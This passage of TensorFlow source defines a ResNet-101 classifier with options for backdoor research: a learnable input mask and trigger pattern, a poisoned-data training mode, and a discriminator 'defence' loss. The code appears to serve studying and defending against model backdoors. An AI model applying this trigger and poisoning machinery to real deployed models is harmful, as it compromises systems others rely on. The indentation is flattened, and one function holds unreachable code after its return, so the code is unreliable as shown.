res4b7_branch2b_pad = tf.pad(res4b7_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b7_branch2b = self.convolution(res4b7_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b7_branch2b')
bn4b7_branch2b = self.batch_normalization(res4b7_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b7_branch2b')
res4b7_branch2b_relu = tf.nn.relu(bn4b7_branch2b, name='res4b7_branch2b_relu')
res4b7_branch2c = self.convolution(res4b7_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b7_branch2c')
bn4b7_branch2c = self.batch_normalization(res4b7_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b7_branch2c')
res4b7 = res4b6_relu + bn4b7_branch2c
res4b7_relu = tf.nn.relu(res4b7, name='res4b7_relu')
res4b8_branch2a = self.convolution(res4b7_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b8_branch2a')
bn4b8_branch2a = self.batch_normalization(res4b8_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b8_branch2a')
res4b8_branch2a_relu = tf.nn.relu(bn4b8_branch2a, name='res4b8_branch2a_relu')
res4b8_branch2b_pad = tf.pad(res4b8_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b8_branch2b = self.convolution(res4b8_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b8_branch2b')
bn4b8_branch2b = self.batch_normalization(res4b8_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b8_branch2b')
res4b8_branch2b_relu = tf.nn.relu(bn4b8_branch2b, name='res4b8_branch2b_relu')
res4b8_branch2c = self.convolution(res4b8_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b8_branch2c')
bn4b8_branch2c = self.batch_normalization(res4b8_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b8_branch2c')
res4b8 = res4b7_relu + bn4b8_branch2c
res4b8_relu = tf.nn.relu(res4b8, name='res4b8_relu')
res4b9_branch2a = self.convolution(res4b8_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b9_branch2a')
bn4b9_branch2a = self.batch_normalization(res4b9_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b9_branch2a')
res4b9_branch2a_relu = tf.nn.relu(bn4b9_branch2a, name='res4b9_branch2a_relu')
res4b9_branch2b_pad = tf.pad(res4b9_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b9_branch2b = self.convolution(res4b9_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b9_branch2b')
bn4b9_branch2b = self.batch_normalization(res4b9_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b9_branch2b')
res4b9_branch2b_relu = tf.nn.relu(bn4b9_branch2b, name='res4b9_branch2b_relu')
res4b9_branch2c = self.convolution(res4b9_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b9_branch2c')
bn4b9_branch2c = self.batch_normalization(res4b9_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b9_branch2c')
res4b9 = res4b8_relu + bn4b9_branch2c
res4b9_relu = tf.nn.relu(res4b9, name='res4b9_relu')
res4b10_branch2a = self.convolution(res4b9_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b10_branch2a')
bn4b10_branch2a = self.batch_normalization(res4b10_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b10_branch2a')
res4b10_branch2a_relu = tf.nn.relu(bn4b10_branch2a, name='res4b10_branch2a_relu')
res4b10_branch2b_pad = tf.pad(res4b10_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b10_branch2b = self.convolution(res4b10_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b10_branch2b')
bn4b10_branch2b = self.batch_normalization(res4b10_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b10_branch2b')
res4b10_branch2b_relu = tf.nn.relu(bn4b10_branch2b, name='res4b10_branch2b_relu')
res4b10_branch2c = self.convolution(res4b10_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b10_branch2c')
bn4b10_branch2c = self.batch_normalization(res4b10_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b10_branch2c')
res4b10 = res4b9_relu + bn4b10_branch2c
res4b10_relu = tf.nn.relu(res4b10, name='res4b10_relu')
res4b11_branch2a = self.convolution(res4b10_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b11_branch2a')
bn4b11_branch2a = self.batch_normalization(res4b11_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b11_branch2a')
res4b11_branch2a_relu = tf.nn.relu(bn4b11_branch2a, name='res4b11_branch2a_relu')
res4b11_branch2b_pad = tf.pad(res4b11_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b11_branch2b = self.convolution(res4b11_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b11_branch2b')
bn4b11_branch2b = self.batch_normalization(res4b11_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b11_branch2b')
res4b11_branch2b_relu = tf.nn.relu(bn4b11_branch2b, name='res4b11_branch2b_relu')
res4b11_branch2c = self.convolution(res4b11_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b11_branch2c')
bn4b11_branch2c = self.batch_normalization(res4b11_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b11_branch2c')
res4b11 = res4b10_relu + bn4b11_branch2c
res4b11_relu = tf.nn.relu(res4b11, name='res4b11_relu')
res4b12_branch2a = self.convolution(res4b11_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b12_branch2a')
bn4b12_branch2a = self.batch_normalization(res4b12_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b12_branch2a')
res4b12_branch2a_relu = tf.nn.relu(bn4b12_branch2a, name='res4b12_branch2a_relu')
res4b12_branch2b_pad = tf.pad(res4b12_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b12_branch2b = self.convolution(res4b12_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b12_branch2b')
bn4b12_branch2b = self.batch_normalization(res4b12_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b12_branch2b')
res4b12_branch2b_relu = tf.nn.relu(bn4b12_branch2b, name='res4b12_branch2b_relu')
res4b12_branch2c = self.convolution(res4b12_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b12_branch2c')
bn4b12_branch2c = self.batch_normalization(res4b12_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b12_branch2c')
res4b12 = res4b11_relu + bn4b12_branch2c
res4b12_relu = tf.nn.relu(res4b12, name='res4b12_relu')
res4b13_branch2a = self.convolution(res4b12_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b13_branch2a')
bn4b13_branch2a = self.batch_normalization(res4b13_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b13_branch2a')
res4b13_branch2a_relu = tf.nn.relu(bn4b13_branch2a, name='res4b13_branch2a_relu')
res4b13_branch2b_pad = tf.pad(res4b13_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b13_branch2b = self.convolution(res4b13_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b13_branch2b')
bn4b13_branch2b = self.batch_normalization(res4b13_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b13_branch2b')
res4b13_branch2b_relu = tf.nn.relu(bn4b13_branch2b, name='res4b13_branch2b_relu')
res4b13_branch2c = self.convolution(res4b13_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b13_branch2c')
bn4b13_branch2c = self.batch_normalization(res4b13_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b13_branch2c')
res4b13 = res4b12_relu + bn4b13_branch2c
res4b13_relu = tf.nn.relu(res4b13, name='res4b13_relu')
res4b14_branch2a = self.convolution(res4b13_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b14_branch2a')
bn4b14_branch2a = self.batch_normalization(res4b14_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b14_branch2a')
res4b14_branch2a_relu = tf.nn.relu(bn4b14_branch2a, name='res4b14_branch2a_relu')
res4b14_branch2b_pad = tf.pad(res4b14_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b14_branch2b = self.convolution(res4b14_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b14_branch2b')
bn4b14_branch2b = self.batch_normalization(res4b14_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b14_branch2b')
res4b14_branch2b_relu = tf.nn.relu(bn4b14_branch2b, name='res4b14_branch2b_relu')
res4b14_branch2c = self.convolution(res4b14_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b14_branch2c')
bn4b14_branch2c = self.batch_normalization(res4b14_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b14_branch2c')
res4b14 = res4b13_relu + bn4b14_branch2c
res4b14_relu = tf.nn.relu(res4b14, name='res4b14_relu')
res4b15_branch2a = self.convolution(res4b14_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b15_branch2a')
bn4b15_branch2a = self.batch_normalization(res4b15_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b15_branch2a')
res4b15_branch2a_relu = tf.nn.relu(bn4b15_branch2a, name='res4b15_branch2a_relu')
res4b15_branch2b_pad = tf.pad(res4b15_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b15_branch2b = self.convolution(res4b15_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b15_branch2b')
bn4b15_branch2b = self.batch_normalization(res4b15_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b15_branch2b')
res4b15_branch2b_relu = tf.nn.relu(bn4b15_branch2b, name='res4b15_branch2b_relu')
res4b15_branch2c = self.convolution(res4b15_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b15_branch2c')
bn4b15_branch2c = self.batch_normalization(res4b15_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b15_branch2c')
res4b15 = res4b14_relu + bn4b15_branch2c
res4b15_relu = tf.nn.relu(res4b15, name='res4b15_relu')
res4b16_branch2a = self.convolution(res4b15_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b16_branch2a')
bn4b16_branch2a = self.batch_normalization(res4b16_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b16_branch2a')
res4b16_branch2a_relu = tf.nn.relu(bn4b16_branch2a, name='res4b16_branch2a_relu')
res4b16_branch2b_pad = tf.pad(res4b16_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b16_branch2b = self.convolution(res4b16_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b16_branch2b')
bn4b16_branch2b = self.batch_normalization(res4b16_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b16_branch2b')
res4b16_branch2b_relu = tf.nn.relu(bn4b16_branch2b, name='res4b16_branch2b_relu')
res4b16_branch2c = self.convolution(res4b16_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b16_branch2c')
bn4b16_branch2c = self.batch_normalization(res4b16_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b16_branch2c')
res4b16 = res4b15_relu + bn4b16_branch2c
res4b16_relu = tf.nn.relu(res4b16, name='res4b16_relu')
res4b17_branch2a = self.convolution(res4b16_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b17_branch2a')
bn4b17_branch2a = self.batch_normalization(res4b17_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b17_branch2a')
res4b17_branch2a_relu = tf.nn.relu(bn4b17_branch2a, name='res4b17_branch2a_relu')
res4b17_branch2b_pad = tf.pad(res4b17_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b17_branch2b = self.convolution(res4b17_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b17_branch2b')
bn4b17_branch2b = self.batch_normalization(res4b17_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b17_branch2b')
res4b17_branch2b_relu = tf.nn.relu(bn4b17_branch2b, name='res4b17_branch2b_relu')
res4b17_branch2c = self.convolution(res4b17_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b17_branch2c')
bn4b17_branch2c = self.batch_normalization(res4b17_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b17_branch2c')
res4b17 = res4b16_relu + bn4b17_branch2c
res4b17_relu = tf.nn.relu(res4b17, name='res4b17_relu')
res4b18_branch2a = self.convolution(res4b17_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b18_branch2a')
bn4b18_branch2a = self.batch_normalization(res4b18_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b18_branch2a')
res4b18_branch2a_relu = tf.nn.relu(bn4b18_branch2a, name='res4b18_branch2a_relu')
res4b18_branch2b_pad = tf.pad(res4b18_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b18_branch2b = self.convolution(res4b18_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b18_branch2b')
bn4b18_branch2b = self.batch_normalization(res4b18_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b18_branch2b')
res4b18_branch2b_relu = tf.nn.relu(bn4b18_branch2b, name='res4b18_branch2b_relu')
res4b18_branch2c = self.convolution(res4b18_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b18_branch2c')
bn4b18_branch2c = self.batch_normalization(res4b18_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b18_branch2c')
res4b18 = res4b17_relu + bn4b18_branch2c
res4b18_relu = tf.nn.relu(res4b18, name='res4b18_relu')
res4b19_branch2a = self.convolution(res4b18_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b19_branch2a')
bn4b19_branch2a = self.batch_normalization(res4b19_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b19_branch2a')
res4b19_branch2a_relu = tf.nn.relu(bn4b19_branch2a, name='res4b19_branch2a_relu')
res4b19_branch2b_pad = tf.pad(res4b19_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b19_branch2b = self.convolution(res4b19_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b19_branch2b')
bn4b19_branch2b = self.batch_normalization(res4b19_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b19_branch2b')
res4b19_branch2b_relu = tf.nn.relu(bn4b19_branch2b, name='res4b19_branch2b_relu')
res4b19_branch2c = self.convolution(res4b19_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b19_branch2c')
bn4b19_branch2c = self.batch_normalization(res4b19_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b19_branch2c')
res4b19 = res4b18_relu + bn4b19_branch2c
res4b19_relu = tf.nn.relu(res4b19, name='res4b19_relu')
res4b20_branch2a = self.convolution(res4b19_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b20_branch2a')
bn4b20_branch2a = self.batch_normalization(res4b20_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b20_branch2a')
res4b20_branch2a_relu = tf.nn.relu(bn4b20_branch2a, name='res4b20_branch2a_relu')
res4b20_branch2b_pad = tf.pad(res4b20_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b20_branch2b = self.convolution(res4b20_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b20_branch2b')
bn4b20_branch2b = self.batch_normalization(res4b20_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b20_branch2b')
res4b20_branch2b_relu = tf.nn.relu(bn4b20_branch2b, name='res4b20_branch2b_relu')
res4b20_branch2c = self.convolution(res4b20_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b20_branch2c')
bn4b20_branch2c = self.batch_normalization(res4b20_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b20_branch2c')
res4b20 = res4b19_relu + bn4b20_branch2c
res4b20_relu = tf.nn.relu(res4b20, name='res4b20_relu')
res4b21_branch2a = self.convolution(res4b20_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b21_branch2a')
bn4b21_branch2a = self.batch_normalization(res4b21_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b21_branch2a')
res4b21_branch2a_relu = tf.nn.relu(bn4b21_branch2a, name='res4b21_branch2a_relu')
res4b21_branch2b_pad = tf.pad(res4b21_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b21_branch2b = self.convolution(res4b21_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b21_branch2b')
bn4b21_branch2b = self.batch_normalization(res4b21_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b21_branch2b')
res4b21_branch2b_relu = tf.nn.relu(bn4b21_branch2b, name='res4b21_branch2b_relu')
res4b21_branch2c = self.convolution(res4b21_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b21_branch2c')
bn4b21_branch2c = self.batch_normalization(res4b21_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b21_branch2c')
res4b21 = res4b20_relu + bn4b21_branch2c
res4b21_relu = tf.nn.relu(res4b21, name='res4b21_relu')
res4b22_branch2a = self.convolution(res4b21_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b22_branch2a')
bn4b22_branch2a = self.batch_normalization(res4b22_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b22_branch2a')
res4b22_branch2a_relu = tf.nn.relu(bn4b22_branch2a, name='res4b22_branch2a_relu')
res4b22_branch2b_pad = tf.pad(res4b22_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b22_branch2b = self.convolution(res4b22_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b22_branch2b')
bn4b22_branch2b = self.batch_normalization(res4b22_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b22_branch2b')
res4b22_branch2b_relu = tf.nn.relu(bn4b22_branch2b, name='res4b22_branch2b_relu')
res4b22_branch2c = self.convolution(res4b22_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b22_branch2c')
bn4b22_branch2c = self.batch_normalization(res4b22_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b22_branch2c')
res4b22 = res4b21_relu + bn4b22_branch2c
res4b22_relu = tf.nn.relu(res4b22, name='res4b22_relu')
res5a_branch2a = self.convolution(res4b22_relu, group=1, strides=[2, 2], padding='VALID', name='res5a_branch2a')
res5a_branch1 = self.convolution(res4b22_relu, group=1, strides=[2, 2], padding='VALID', name='res5a_branch1')
bn5a_branch2a = self.batch_normalization(res5a_branch2a, variance_epsilon=9.99999974738e-06,
name='bn5a_branch2a')
bn5a_branch1 = self.batch_normalization(res5a_branch1, variance_epsilon=9.99999974738e-06, name='bn5a_branch1')
res5a_branch2a_relu = tf.nn.relu(bn5a_branch2a, name='res5a_branch2a_relu')
res5a_branch2b_pad = tf.pad(res5a_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res5a_branch2b = self.convolution(res5a_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res5a_branch2b')
bn5a_branch2b = self.batch_normalization(res5a_branch2b, variance_epsilon=9.99999974738e-06,
name='bn5a_branch2b')
res5a_branch2b_relu = tf.nn.relu(bn5a_branch2b, name='res5a_branch2b_relu')
res5a_branch2c = self.convolution(res5a_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res5a_branch2c')
bn5a_branch2c = self.batch_normalization(res5a_branch2c, variance_epsilon=9.99999974738e-06,
name='bn5a_branch2c')
res5a = bn5a_branch1 + bn5a_branch2c
res5a_relu = tf.nn.relu(res5a, name='res5a_relu')
res5b_branch2a = self.convolution(res5a_relu, group=1, strides=[1, 1], padding='VALID', name='res5b_branch2a')
bn5b_branch2a = self.batch_normalization(res5b_branch2a, variance_epsilon=9.99999974738e-06,
name='bn5b_branch2a')
res5b_branch2a_relu = tf.nn.relu(bn5b_branch2a, name='res5b_branch2a_relu')
res5b_branch2b_pad = tf.pad(res5b_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res5b_branch2b = self.convolution(res5b_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res5b_branch2b')
bn5b_branch2b = self.batch_normalization(res5b_branch2b, variance_epsilon=9.99999974738e-06,
name='bn5b_branch2b')
res5b_branch2b_relu = tf.nn.relu(bn5b_branch2b, name='res5b_branch2b_relu')
res5b_branch2c = self.convolution(res5b_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res5b_branch2c')
bn5b_branch2c = self.batch_normalization(res5b_branch2c, variance_epsilon=9.99999974738e-06,
name='bn5b_branch2c')
res5b = res5a_relu + bn5b_branch2c
res5b_relu = tf.nn.relu(res5b, name='res5b_relu')
res5c_branch2a = self.convolution(res5b_relu, group=1, strides=[1, 1], padding='VALID', name='res5c_branch2a')
bn5c_branch2a = self.batch_normalization(res5c_branch2a, variance_epsilon=9.99999974738e-06,
name='bn5c_branch2a')
res5c_branch2a_relu = tf.nn.relu(bn5c_branch2a, name='res5c_branch2a_relu')
res5c_branch2b_pad = tf.pad(res5c_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res5c_branch2b = self.convolution(res5c_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res5c_branch2b')
bn5c_branch2b = self.batch_normalization(res5c_branch2b, variance_epsilon=9.99999974738e-06,
name='bn5c_branch2b')
res5c_branch2b_relu = tf.nn.relu(bn5c_branch2b, name='res5c_branch2b_relu')
res5c_branch2c = self.convolution(res5c_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res5c_branch2c')
bn5c_branch2c = self.batch_normalization(res5c_branch2c, variance_epsilon=9.99999974738e-06,
name='bn5c_branch2c')
res5c = res5b_relu + bn5c_branch2c
res5c_relu = tf.nn.relu(res5c, name='res5c_relu')
feature_0 = tf.contrib.layers.flatten(res5c_relu)
with tf.variable_scope('feature') as scope:
wts = self._variable_with_constant_value('weight', self.__weights_dict['feature_1']['weights'])
bis = self._variable_with_constant_value('bias', self.__weights_dict['feature_1']['bias'])
feature_1 = tf.add(tf.matmul(feature_0, wts), bis)
cnn.top_layer = feature_1
cnn.top_size = int(bis.shape[-1])
cnn.dropout()
def _backdoor_mask(self, cnn):
with tf.variable_scope('input_mask') as scope:
in_shape = cnn.top_layer.shape
shape = np.zeros(4, dtype=np.int32)
shape[0] = 1
shape[1] = int(in_shape[1])
shape[2] = int(in_shape[2])
shape[3] = 1
mask_param = tf.get_variable('mask_param', shape, dtype=tf.float32, initializer=tf.random_normal_initializer(),
trainable=self.trainable)
mask = (tf.tanh(mask_param) + 1.) / 2.
shape[3] = int(in_shape[3])
pattern_param = tf.get_variable('pattern_param', shape, dtype=tf.float32,
initializer=tf.glorot_normal_initializer(), trainable=self.trainable)
pattern = tf.tanh(pattern_param)
masked_input = (1 - mask) * cnn.top_layer + mask * pattern
if self.options.build_level == 'mask_only':
cnn.top_layer = pattern
cnn.aux_top_layer = mask
else:
cnn.top_layer = masked_input
cnn.aux_top_layer = mask
def skip_final_affine_layer(self):
return True
def add_inference(self, cnn):
if 'backdoor' in self.options.net_mode:
self.trainable = cnn.phase_train and (self.options.fix_level != 'all') \
and ('mask' not in self.options.fix_level)
cnn.trainable = self.trainable
self._backdoor_mask(cnn)
if self.options.build_level == 'mask_only':
return cnn.top_layer
self.trainable = cnn.phase_train and (self.options.fix_level != 'all') \
and ('bottom' not in self.options.fix_level)
cnn.trainable = self.trainable
if self.model_name == 'resnet101':
self._resnet101_inference(cnn)
elif self.model_name == 'vgg16':
self._vgg16_inference(cnn)
elif self.model_name == 'googlenet':
self._googlenet_inference(cnn)
elif self.model_name == 'gtsrb':
self._gtsrb_inference(cnn)
elif self.model_name == 'cifar10':
self._resnet20.add_inference(cnn)
elif self.model_name == 'cifar10_alexnet':
self._alexnet.add_inference(cnn)
elif self.model_name == 'resnet50':
self._resnet50.add_inference(cnn)
elif self.model_name == 'benchmark_resnet101':
self._resnet101.add_inference(cnn)
cnn.affine(256, activation='linear')
if self.options.net_mode == 'triple_loss' or 'discriminator' in self.options.net_mode:
cnn.aux_top_layer = cnn.top_layer
cnn.aux_top_size = cnn.top_size
if self.options.build_level == 'logits':
self.trainable = cnn.phase_train and (self.options.fix_level != 'all') \
and ('affine' not in self.options.fix_level)
cnn.trainable = self.trainable
name = ('fc%d_1' % self.num_class)
initializers = None
if (hasattr(self, '__weights_dict')) and (name in self.__weights_dict):
print('===Debug===Hi, I found it ' + name)
initializers = []
initializers.append(tf.constant_initializer(self.__weights_dict[name]['weights']))
initializers.append(tf.constant_initializer(self.__weights_dict[name]['bias']))
cnn.affine(self.num_class, activation='linear', initializers=initializers)
self.last_affine_name = 'affine' + str(cnn.counts['affine']-1)
if 'discriminator' in self.options.net_mode:
self.trainable = cnn.phase_train and (self.options.fix_level != 'all') \
and ('discriminator' not in self.options.fix_level)
cnn.trainable = self.trainable
with tf.variable_scope('discriminator') as scope:
with cnn.switch_to_aux_top_layer():
cnn.affine(256)
cnn.affine(128)
cnn.affine(2, activation='linear')
return cnn.top_layer
def build_network(self,
inputs,
phase_train=True,
nclass=1001):
images = inputs[0]
if self.data_format == 'NCHW':
images = tf.transpose(images, [0, 3, 1, 2])
var_type = tf.float32
if self.data_type == tf.float16 and self.fp16_vars:
var_type = tf.float16
network = convnet_builder.ConvNetBuilder(
images, self.depth, phase_train, self.use_tf_layers, self.data_format,
self.data_type, var_type)
with tf.variable_scope('cg', custom_getter=network.get_custom_getter()):
self.add_inference(network)
logits = network.top_layer
aux_logits = network.aux_top_layer
# Add the final fully-connected class layer
#if not self.skip_final_affine_layer():
# logits = network.affine(nclass, activation='linear')
# aux_logits = None
# if network.aux_top_layer is not None:
# with network.switch_to_aux_top_layer():
# aux_logits = network.affine(nclass, activation='linear', stddev=0.001)
if self.data_type == tf.float16:
# TODO(reedwm): Determine if we should do this cast here.
logits = tf.cast(logits, tf.float32)
if aux_logits is not None:
aux_logits = tf.cast(aux_logits, tf.float32)
return model_lib.BuildNetworkResult(
logits=logits, extra_info=None if aux_logits is None else aux_logits)
def get_learning_rate(self, global_step, batch_size):
if self.options.data_mode == 'poison' or self.options.load_mode != 'normal':
return self.options.base_lr
if hasattr(self,'_resnet50'):
return self._resnet50.get_learning_rate(global_step, batch_size)
elif hasattr(self,'_resnet101'):
return self._resnet101.get_learning_rate(global_step, batch_size)
elif hasattr(self,'_resnet20'):
return self._resnet20.get_learning_rate(global_step, batch_size)
elif hasattr(self,'_alexnet'):
return self._alexnet.get_learning_rate(global_step, batch_size)
return self.options.base_lr
def batch_normalization(self, input, name, **kwargs):
with tf.variable_scope(name):
# moving_mean & moving_variance
mean = self._variable_with_constant_value('mean', self.__weights_dict[name]['mean'], False)
variance = self._variable_with_constant_value('var', self.__weights_dict[name]['var'], False)
offset = self._variable_with_constant_value('bias', self.__weights_dict[name]['bias']) \
if 'bias' in self.__weights_dict[name] else None
scale = self._variable_with_constant_value('scale', self.__weights_dict[name]['scale']) \
if 'scale' in self.__weights_dict[name] else None
if not self.trainable:
decay = 0.999
bn, batch_mean, batch_variance = tf.nn.fused_batch_norm(input, scale=scale, offset=offset,
name=name, is_training=True, epsilon=1e-5)
mean_update = moving_averages.assign_moving_average(mean, batch_mean, decay=decay, zero_debias=False)
variance_update = moving_averages.assign_moving_average(variance, batch_variance, decay=decay,
zero_debias=False)
tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, mean_update)
tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, variance_update)
else:
bn, _, _ = tf.nn.fused_batch_norm(input, scale=scale, offset=offset, mean=mean, variance=variance,
name=name, is_training=False, epsilon=1e-5)
return bn
def convolution(self, input, name, group, strides, padding):
with tf.variable_scope(name):
w = self._variable_with_constant_value('weight', self.__weights_dict[name]['weights'])
strides = [1] + strides + [1]
layer = tf.nn.conv2d(input, w, strides=strides, padding=padding)
if 'bias' in self.__weights_dict[name]:
b = self._variable_with_constant_value('bias', self.__weights_dict[name]['bias'])
layer = tf.nn.bias_add(layer, b)
return layer
def _classification_loss(self, logits, aux_logits, labels):
with tf.name_scope('xentropy'):
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=logits, labels=labels)
loss = tf.reduce_mean(cross_entropy, name='xentropy_mean')
if aux_logits is not None:
with tf.name_scope('aux_xentropy'):
aux_cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=aux_logits, labels=labels)
aux_loss = 0.4 * tf.reduce_mean(aux_cross_entropy, name='aux_loss')
loss = tf.add_n([loss, aux_loss])
return loss
def _discriminator_loss(self, logits, aux_logits, labels, poison_lbs):
with tf.name_scope('discriminator_xentropy'):
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=aux_logits, labels=poison_lbs)
loss = tf.reduce_mean(cross_entropy, name='discriminator_mean')
return loss
if ('defence' in self.options.net_mode):
with tf.name_scope('discriminator_xentropy'):
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=aux_logits, labels=poison_lbs)
loss = tf.reduce_mean(cross_entropy, name='discriminator_mean')
else:
with tf.name_scope('xentropy'):
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=logits, labels=labels)
loss = tf.reduce_mean(cross_entropy, name='xentropy_mean')
if aux_logits is not None:
with tf.name_scope('discriminator_xentropy'):
aux_cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=aux_logits, labels=poison_lbs)
aux_loss = -1.0 * tf.reduce_mean(aux_cross_entropy, name='discriminator_mean')
loss = tf.add_n([loss, aux_loss])
return loss
